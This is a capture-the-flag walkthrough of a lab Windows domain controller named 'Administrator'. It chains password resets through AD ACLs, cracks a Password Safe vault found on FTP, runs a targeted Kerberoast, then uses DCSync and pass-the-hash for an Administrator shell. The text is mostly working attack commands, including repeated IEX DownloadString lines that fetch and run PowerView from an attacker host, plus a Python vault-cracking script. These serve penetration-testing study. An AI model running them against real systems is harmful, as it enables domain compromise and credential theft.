👑 Administrator

Machine: Administrator
Difficulty: Medium
Theme: AD ACL abuse → password resets → FTP credential vault → Password Safe cracking → GenericWrite targeted Kerberoasting → DCSync → Administrator shell


🎯 Summary

Administrator is a Windows Active Directory machine focused on chained AD object-control abuse.

Initial enumeration identifies a domain controller exposing FTP, DNS, Kerberos, LDAP, SMB, WinRM, ADWS, and RPC services. Using the provided low-privileged account, RustHound/BloodHound reveals that Olivia has GenericAll over Michael. This allows Michael’s password to be reset.

Michael then has password-control rights over Benjamin. After resetting Benjamin’s password, his membership in Share Moderators becomes useful because he can authenticate to FTP. FTP exposes a small Backup.psafe3 Password Safe v3 database. The file is downloaded in binary mode, cracked offline with Hashcat, and opened with pwsafe, revealing several stored credentials.

Only Emily’s recovered credential is valid and gives WinRM access. BloodHound then shows Emily has GenericWrite over Ethan. This is abused by adding a fake SPN to Ethan, verifying the SPN write inside Evil-WinRM, then requesting the TGS from Kali when PowerView’s ticket request fails inside the WinRM session. The resulting Kerberos hash is cracked, revealing Ethan’s password.

Ethan has DCSync rights over the domain. Using Ethan’s credentials, domain hashes are dumped with secretsdump. The Administrator NT hash is then used with Evil-WinRM pass-the-hash to obtain an Administrator shell and read the root flag.


1. Enumeration

Initial scanning showed a Windows domain controller.

Full TCP scan:

sudo nmap -p- --min-rate=5000 -T4 -vv -oA nmap/administrator_portscan [TARGET_IP]

Targeted service scan:

sudo nmap -sC -sV -vv -oA nmap/administrator [TARGET_IP]

Important services:

21/tcp    ftp
53/tcp    domain
88/tcp    kerberos-sec
135/tcp   msrpc
139/tcp   netbios-ssn
389/tcp   ldap
445/tcp   microsoft-ds
464/tcp   kpasswd5
593/tcp   http-rpc-epmap
636/tcp   ldapssl
3268/tcp  globalcatLDAP
3269/tcp  globalcatLDAPssl
5985/tcp  winrm
9389/tcp  adws

The host behaved like a domain controller:

Domain: administrator.htb
Host:   DC
FQDN:   dc.administrator.htb

The hostnames were added to /etc/hosts:

echo "[TARGET_IP] dc.administrator.htb administrator.htb dc" | sudo tee -a /etc/hosts

Nmap also showed a large clock skew, which mattered later for Kerberos-based attacks.


2. Initial Credential Validation

The provided credential was validated across domain services:

nxc smb administrator.htb -u '[USER]' -p '[PASS]'
nxc ldap administrator.htb -u '[USER]' -p '[PASS]'
nxc winrm administrator.htb -u '[USER]' -p '[PASS]'

Olivia had valid access over SMB, LDAP, and WinRM.

SMB share enumeration only showed default domain shares:

nxc smb administrator.htb -u '[USER]' -p '[PASS]' --shares

Readable shares:

IPC$      READ
NETLOGON  READ
SYSVOL    READ

At this point, the useful path was not SMB loot. The better path was AD relationship enumeration.


3. RustHound / BloodHound Collection

RustHound-CE was used with Olivia’s credentials:

rusthound-ce --domain administrator.htb -u '[USER]' -p '[PASS]' -z

The generated zip was imported into BloodHound.

Important early gotcha:

An old BloodHound database from a previous box caused confusing output, including wrong-domain object updates. Cleaning the BloodHound/Neo4j state and importing only the Administrator data fixed this.

BloodHound showed:

OLIVIA@ADMINISTRATOR.HTB --GenericAll--> MICHAEL@ADMINISTRATOR.HTB

This meant Olivia could take control of Michael’s AD user object.


4. Olivia GenericAll over Michael

Olivia had WinRM access:

evil-winrm -i dc.administrator.htb -u Olivia -p '[OLIVIA_PASS]'

Inside the session, PowerView was loaded:

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Important gotcha:

Set-DomainUserPassword is not a native PowerShell cmdlet. It only exists after PowerView is loaded.

Michael was verified:

Get-DomainUser -Identity Michael

Olivia’s GenericAll was abused to reset Michael’s password:

Set-DomainUserPassword -Identity Michael -AccountPassword (ConvertTo-SecureString '[NEW_PASS]' -AsPlainText -Force)

Michael’s new credential was validated:

nxc smb administrator.htb -u 'Michael' -p '[NEW_PASS]'

This confirmed the first ACL abuse step worked.


5. Michael ForceChangePassword over Benjamin

A WinRM shell was opened as Michael:

evil-winrm -i dc.administrator.htb -u Michael -p '[MICHAEL_PASS]'

PowerView was loaded again because each new Evil-WinRM session starts clean:

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Benjamin was inspected:

Get-DomainUser -Identity Benjamin

Important finding:

Benjamin -> MemberOf -> Share Moderators

Michael’s password-control edge over Benjamin was abused:

$NewPass = ConvertTo-SecureString '[NEW_PASS]' -AsPlainText -Force
Set-DomainUserPassword -Identity Benjamin -AccountPassword $NewPass

Benjamin’s credential was validated:

nxc smb administrator.htb -u 'Benjamin' -p '[BENJAMIN_PASS]'
nxc ldap administrator.htb -u 'Benjamin' -p '[BENJAMIN_PASS]'

SMB still only showed default shares, so the next useful target was FTP.


6. FTP as Benjamin

Benjamin authenticated to FTP:

nxc ftp administrator.htb -u 'Benjamin' -p '[BENJAMIN_PASS]'

Manual FTP login:

ftp [TARGET_IP]

Inside FTP:

Name: Benjamin
Password: [BENJAMIN_PASS]

The directory contained:

Backup.psafe3

Important gotcha:

The first download happened in ASCII mode and produced a warning. ASCII mode rewrites line endings in transit, which silently corrupts any binary file; since .psafe3 is a binary vault format, the file was downloaded again in binary mode.

binary
get Backup.psafe3

The file was a Password Safe v3 database.


7. Cracking the Password Safe Database

Hashcat supports Password Safe v3 with mode 5200.

The vault was cracked directly:

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

Recovered:

Backup.psafe3:[VAULT_PASSWORD]

The vault was opened with pwsafe using the recovered master password.
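Before spending GPU time, it is worth confirming that the download is structurally intact and understanding what mode 5200 actually tests. The following Python is an added example, not part of the original writeup, of Password Safe, or of Hashcat: it parses the fixed PWS3 header, rejects files an ASCII-mode transfer has mangled, and reimplements the spec's key stretching (SHA-256 over passphrase||salt, then ITER further SHA-256 rounds, with SHA-256 of the result compared against the stored H(P')) so a short candidate list can be tested offline. The vault it builds is a constructed stand-in with the encrypted key blocks, IV, body and HMAC zero-filled or faked, since the passphrase check never touches them; the salt and passphrase are placeholders.

```python
"""Password Safe v3 (.psafe3) integrity check and passphrase verification.

Added example, not from the original writeup. Only hashlib and struct are
used; the encrypted key blocks (B1..B4) are never decrypted.
"""
import hashlib
import struct
from typing import Optional

PWS3_TAG = b"PWS3"
PWS3_EOF = b"PWS3-EOFPWS3-EOF"
# Fixed header: TAG(4) SALT(32) ITER(4) H(P')(32) B1..B4(4*32) IV(16)
HEADER_LEN = 4 + 32 + 4 + 32 + 4 * 32 + 16
TRAILER_LEN = len(PWS3_EOF) + 32  # EOF marker followed by a 32-byte HMAC-SHA256


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """P' per the PWS3 spec: SHA256(passphrase || salt), then ITER more SHA256 rounds."""
    digest = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha256(digest).digest()
    return digest


def parse_header(data: bytes) -> dict:
    """Parse the fixed header, raising ValueError with a diagnostic when the
    file is not a structurally sound PWS3 vault (for example after an
    ASCII-mode FTP transfer rewrote line endings inside it)."""
    if len(data) < HEADER_LEN + TRAILER_LEN:
        raise ValueError("file too short to be a PWS3 vault")
    if data[:4] != PWS3_TAG:
        raise ValueError("missing PWS3 tag: not a Password Safe v3 file, or the transfer corrupted it")
    if data[-TRAILER_LEN:-32] != PWS3_EOF:
        raise ValueError("PWS3-EOF marker not at the expected offset: truncated or mangled download")
    body_len = len(data) - HEADER_LEN - TRAILER_LEN
    if body_len % 16 != 0:
        raise ValueError(f"encrypted body is {body_len} bytes, not a multiple of the 16-byte Twofish block")
    iterations = struct.unpack("<I", data[36:40])[0]
    return {"salt": data[4:36], "iterations": iterations, "hp": data[40:72]}


def is_valid_vault(data: bytes) -> bool:
    try:
        parse_header(data)
        return True
    except ValueError:
        return False


def check_passphrase(header: dict, candidate: bytes) -> bool:
    """The comparison Hashcat 5200 performs: SHA256(P') == stored H(P')."""
    hp = hashlib.sha256(stretch_key(candidate, header["salt"], header["iterations"])).digest()
    return hp == header["hp"]


def crack(data: bytes, wordlist) -> Optional[bytes]:
    """Return the first candidate that opens the vault, or None."""
    header = parse_header(data)
    for word in wordlist:
        if check_passphrase(header, word):
            return word
    return None


def build_sample_vault(passphrase: bytes, salt: bytes, iterations: int = 2048) -> bytes:
    """Constructed stand-in for Backup.psafe3: a genuine header for the given
    passphrase, then filler for B1..B4, IV, two fake Twofish blocks and the
    HMAC. The filler body deliberately contains 0x0a so an ASCII-mode
    transfer would alter it."""
    hp = hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest()
    header = PWS3_TAG + salt + struct.pack("<I", iterations) + hp + b"\x00" * (4 * 32 + 16)
    body = bytes(range(16)) * 2
    return header + body + PWS3_EOF + b"\x00" * 32


def ascii_mode_mangle(data: bytes) -> bytes:
    """Simulate an ASCII-mode FTP transfer: every LF becomes CRLF."""
    return data.replace(b"\n", b"\r\n")


if __name__ == "__main__":
    # Constructed salt with no 0x0a bytes, so only the body is affected by the mangling demo.
    vault = build_sample_vault(b"vault-pass", bytes(range(0x40, 0x60)))
    print("intact vault valid:", is_valid_vault(vault))
    print("ASCII-mangled copy valid:", is_valid_vault(ascii_mode_mangle(vault)))
    print("cracked:", crack(vault, [b"123456", b"password", b"vault-pass"]))
```

On a real download, run parse_header over the file first; a structural error means re-fetch in binary mode rather than blaming the wordlist. The loop is only a few thousand SHA-256 rounds per candidate, which is fine for a handful of guesses but is exactly why rockyou-scale runs belong in Hashcat.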

Stored entries included several domain users. Known or attacker-set credentials were separated from newly recovered ones.

The useful new candidate was Emily.

Emily’s credential was validated:

nxc smb administrator.htb -u 'Emily' -p '[EMILY_PASS]'
nxc ldap administrator.htb -u 'Emily' -p '[EMILY_PASS]'
nxc winrm administrator.htb -u 'Emily' -p '[EMILY_PASS]'

Emily had WinRM access.


8. WinRM as Emily

A shell was opened as Emily:

evil-winrm -i dc.administrator.htb -u Emily -p '[EMILY_PASS]'

The user flag was recovered from:

C:\Users\emily\Desktop\user.txt

BloodHound showed the next key edge:

EMILY@ADMINISTRATOR.HTB --GenericWrite--> ETHAN@ADMINISTRATOR.HTB
ETHAN@ADMINISTRATOR.HTB --DCSync--> ADMINISTRATOR.HTB

GenericWrite does not directly give Ethan’s password, but it allows modifying writable attributes on Ethan’s user object. This makes targeted Kerberoasting possible by temporarily adding an SPN.


9. Emily GenericWrite over Ethan

PowerView was loaded in Emily’s shell:

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Ethan was inspected:

Get-DomainUser -Identity Ethan

A fake SPN was added:

Set-DomainObject -Identity Ethan -Set @{serviceprincipalname='fake/spn'}

The SPN write was verified inside Evil-WinRM:

Get-DomainUser -Identity Ethan -Properties serviceprincipalname | Select-Object serviceprincipalname

Expected output:

serviceprincipalname
--------------------
fake/spn

This proved that Emily’s GenericWrite worked.

Attempting to request the ticket inside Evil-WinRM failed:

Get-DomainUser -Identity Ethan | Get-DomainSPNTicket -Format Hashcat

Failure pattern:

The NetworkCredentials provided were unable to create a Kerberos credential

This did not mean the ACL abuse failed. The SPN write worked. The failure is a property of the session: an Evil-WinRM session authenticated with a password is a network logon with no cached TGT, so the .NET KerberosRequestorSecurityToken call PowerView uses to request the service ticket has nothing to authenticate with. The TGS request was therefore moved to Kali, where explicit credentials can be supplied.


10. Kali-Side Targeted Kerberoast Fallback

Because Kerberos is time-sensitive (the KDC rejects requests whose timestamp is more than 5 minutes off by default, answering with KRB_AP_ERR_SKEW), attacker time was synced with the DC:

sudo ntpdate [TARGET_IP]

The TGS was requested from Kali using Emily’s valid credentials:

impacket-GetUserSPNs \
  -dc-ip [TARGET_IP] \
  administrator.htb/Emily:'[EMILY_PASS]' \
  -request-user Ethan \
  -outputfile roast.hash

The output contained a Kerberos TGS hash:

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$...

The hash was cracked with Hashcat mode 13100:

hashcat -m 13100 roast.hash /usr/share/wordlists/rockyou.txt

Recovered:

ethan:[ETHAN_PASS]

The fake SPN was cleaned up from Emily’s WinRM session:

Set-DomainObject -Identity Ethan -Clear serviceprincipalname

Cleanup was verified:

Get-DomainUser -Identity Ethan -Properties serviceprincipalname | Select-Object serviceprincipalname

Expected output:

serviceprincipalname
--------------------

Important gotcha:

PowerView must be loaded again if the Evil-WinRM session is new. Otherwise Set-DomainObject will not exist.


11. Ethan DCSync

Ethan’s credential was validated:

nxc smb administrator.htb -u 'Ethan' -p '[ETHAN_PASS]'
nxc ldap administrator.htb -u 'Ethan' -p '[ETHAN_PASS]'

BloodHound showed Ethan had DCSync rights over the domain.

DCSync was performed with Impacket:

secretsdump.py \
  -outputfile domain_hashes \
  -just-dc \
  administrator.htb/Ethan:'[ETHAN_PASS]'@[TARGET_IP]

Successful output showed DRSUAPI-based NTDS dumping:

[*] Dumping Domain Credentials
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:...:[ADMIN_NT_HASH]:::

This recovered the Administrator NT hash. Note that -just-dc also dumps the Kerberos AES keys for every account; -just-dc-ntlm restricts the output to NTLM hashes when pass-the-hash is all that is needed.


12. Administrator Shell

The Administrator hash was used with Evil-WinRM pass-the-hash.

Important gotcha:

Evil-WinRM expects only the NT hash with -H. Do not prefix it with a colon.

Wrong:

evil-winrm -i dc.administrator.htb -u Administrator -H :[ADMIN_NT_HASH]

Correct:

evil-winrm -i dc.administrator.htb -u Administrator -H [ADMIN_NT_HASH]

Administrator access was confirmed:

whoami

Output:

administrator\administrator

The root flag was recovered from:

C:\Users\Administrator\Desktop\root.txt

🔗 Condensed Attack Chain

Initial scan
  ↓
Domain controller identified
  ↓
/etc/hosts configured
  ↓
Olivia credential validated over SMB/LDAP/WinRM
  ↓
RustHound/BloodHound collection
  ↓
BloodHound stale database issue fixed
  ↓
Olivia GenericAll over Michael
  ↓
PowerView loaded in Olivia WinRM session
  ↓
Michael password reset
  ↓
Michael credential validated
  ↓
Michael ForceChangePassword over Benjamin
  ↓
Benjamin password reset
  ↓
Benjamin credential validated
  ↓
Benjamin FTP access found
  ↓
Backup.psafe3 downloaded in binary mode
  ↓
Password Safe v3 cracked with Hashcat mode 5200
  ↓
Vault opened with pwsafe
  ↓
Emily credential recovered and validated
  ↓
WinRM as Emily
  ↓
user.txt recovered
  ↓
BloodHound shows Emily GenericWrite over Ethan
  ↓
Fake SPN added to Ethan
  ↓
SPN write verified inside Evil-WinRM
  ↓
PowerView ticket request fails due to WinRM/Kerberos context
  ↓
Kali time synced with DC
  ↓
GetUserSPNs requests Ethan TGS from Kali
  ↓
TGS cracked with Hashcat mode 13100
  ↓
Ethan credential recovered
  ↓
Fake SPN cleaned up
  ↓
Ethan credential validated
  ↓
Ethan DCSync over domain
  ↓
secretsdump -just-dc dumps domain hashes
  ↓
Administrator NT hash recovered
  ↓
Evil-WinRM pass-the-hash as Administrator
  ↓
root.txt recovered

🧠 Key Takeaways

BloodHound object-control edges should be translated into exact abuse primitives. GenericAll, ForceChangePassword, GenericWrite, and DCSync each require different actions.

GenericAll over a user is often easiest to abuse by resetting that user’s password.

ForceChangePassword allows a direct password reset but does not imply local admin.

Group names can guide service enumeration. Benjamin’s Share Moderators membership made FTP more interesting than SMB admin shares.

FTP should use binary mode for non-text files. The first ASCII download produced a warning and could have corrupted the .psafe3 vault.

Password Safe v3 files can be cracked with Hashcat mode 5200.

Vault credentials should be tested pairwise first. Do not immediately spray every recovered password against every user.

GenericWrite over a user can be abused for targeted Kerberoasting by adding a temporary SPN.

Always verify the SPN write before troubleshooting Kerberoasting. If the fake SPN appears on the target user, the ACL abuse worked.

PowerView’s Get-DomainSPNTicket may fail inside Evil-WinRM because the session lacks a usable Kerberos credential context.

When PowerView ticket extraction fails inside Evil-WinRM, request the TGS from Kali with explicit credentials.

Kerberos attacks require correct time. Sync with the DC before Kerberoasting if clock skew is present.

Clean up planted SPNs after roasting.

DCSync is an AD replication-rights abuse, not a shell requirement. Ethan did not need WinRM to dump domain hashes.

Evil-WinRM -H expects only the NT hash, not :NT_HASH.


⚡ Commands Cheat Sheet

Host setup

echo "[TARGET_IP] dc.administrator.htb administrator.htb dc" | sudo tee -a /etc/hosts
sudo ntpdate [TARGET_IP]

Initial validation

nxc smb administrator.htb -u '[USER]' -p '[PASS]'
nxc ldap administrator.htb -u '[USER]' -p '[PASS]'
nxc winrm administrator.htb -u '[USER]' -p '[PASS]'

RustHound-CE

rusthound-ce --domain administrator.htb -u '[USER]' -p '[PASS]' -z

Evil-WinRM

evil-winrm -i dc.administrator.htb -u [USER] -p '[PASS]'

Load PowerView

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Reset a controlled user password

Set-DomainUserPassword -Identity [TARGET_USER] -AccountPassword (ConvertTo-SecureString '[NEW_PASS]' -AsPlainText -Force)

FTP download in binary mode

binary
dir
get Backup.psafe3

Crack Password Safe v3

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

GenericWrite targeted Kerberoast

Add fake SPN:

Set-DomainObject -Identity [TARGET_USER] -Set @{serviceprincipalname='fake/spn'}

Verify SPN:

Get-DomainUser -Identity [TARGET_USER] -Properties serviceprincipalname | Select-Object serviceprincipalname

Request TGS from Kali:

sudo ntpdate [TARGET_IP]
 
impacket-GetUserSPNs \
  -dc-ip [TARGET_IP] \
  administrator.htb/[CONTROLLED_USER]:'[CONTROLLED_PASS]' \
  -request-user [TARGET_USER] \
  -outputfile roast.hash

Crack:

hashcat -m 13100 roast.hash /usr/share/wordlists/rockyou.txt

Clean up SPN:

Set-DomainObject -Identity [TARGET_USER] -Clear serviceprincipalname

Verify cleanup:

Get-DomainUser -Identity [TARGET_USER] -Properties serviceprincipalname | Select-Object serviceprincipalname

DCSync

secretsdump.py \
  -outputfile domain_hashes \
  -just-dc \
  administrator.htb/[USER]:'[PASS]'@[TARGET_IP]

Evil-WinRM pass-the-hash

evil-winrm -i dc.administrator.htb -u Administrator -H [ADMIN_NT_HASH]

🧭 Diagnostic Map

Symptom: NetExec updates the wrong BloodHound domain
Meaning: Stale BloodHound/Neo4j data from a previous box
Next:    Clean the database/project and import only the current RustHound zip

Symptom: Set-DomainUserPassword is not recognized
Meaning: PowerView is not loaded
Next:    Load PowerView in the current Evil-WinRM session

Symptom: Password reset returns no output
Meaning: This can be normal
Next:    Validate the new credential over SMB/LDAP/WinRM

Symptom: Benjamin has no useful SMB shares
Meaning: He is not local admin
Next:    Test FTP because of Share Moderators

Symptom: FTP warns about ASCII mode
Meaning: Binary file may be corrupted
Next:    Re-download with binary

Symptom: .psafe3 file is unreadable
Meaning: It is an encrypted Password Safe database
Next:    Crack with Hashcat mode 5200

Symptom: Set-DomainObject succeeds but Get-DomainSPNTicket fails
Meaning: SPN write likely worked, but WinRM lacks usable Kerberos context
Next:    Verify SPN, then request the TGS from Kali

Symptom: Kerberos ticket request fails with clock errors
Meaning: Attacker time differs from DC time
Next:    sudo ntpdate [TARGET_IP]

Symptom: serviceprincipalname still shows fake SPN after roasting
Meaning: Cleanup not done
Next:    Clear the attribute and verify

Symptom: DCSync works but WinRM as Ethan is not available
Meaning: DCSync rights do not imply remote shell rights
Next:    Use secretsdump from Kali with Ethan's credential

Symptom: Evil-WinRM says invalid hash format
Meaning: Hash was passed as :NT_HASH
Next:    Use only the NT hash with -H


📝 Personal Notes

Administrator was a clean CPTS-style AD ACL chaining machine.

The first important lesson was graph hygiene. Stale BloodHound data from a previous machine caused misleading object updates and wrong-domain confusion. Cleaning the database made the path clear.

The second lesson was that each BloodHound edge needs to be mapped to the correct primitive. Olivia’s GenericAll over Michael meant direct account takeover by password reset. Michael’s password-control edge over Benjamin meant another password reset. Emily’s GenericWrite over Ethan required a different approach: attribute modification and targeted Kerberoasting.

Benjamin’s FTP access was a good reminder not to tunnel vision on SMB admin shares. The Share Moderators group name pointed toward file-sharing access, and FTP contained the real credential source.

The Password Safe stage reinforced basic file-handling discipline. Downloading a binary vault in ASCII mode could corrupt it, so binary mode was necessary before cracking.

The most useful troubleshooting moment was the Ethan targeted Kerberoast. The fake SPN write worked and was visible in AD, but PowerView’s ticket request failed inside Evil-WinRM. Verifying the SPN separately made the issue clear: the ACL abuse succeeded, but ticket extraction needed to move to Kali.

The final DCSync stage reinforced that replication rights are enough for domain compromise even without a shell as the DCSync-capable user. Ethan only needed valid credentials and the right AD permissions.

Overall methodology:

Enumerate AD relationships. Translate edges into exact abuse primitives. Validate every new identity. Prioritize services that match group memberships. Treat vaults and backups as credential sources. Verify writes before troubleshooting downstream Kerberos errors. Clean up modifications. Use DCSync carefully once replication rights are confirmed.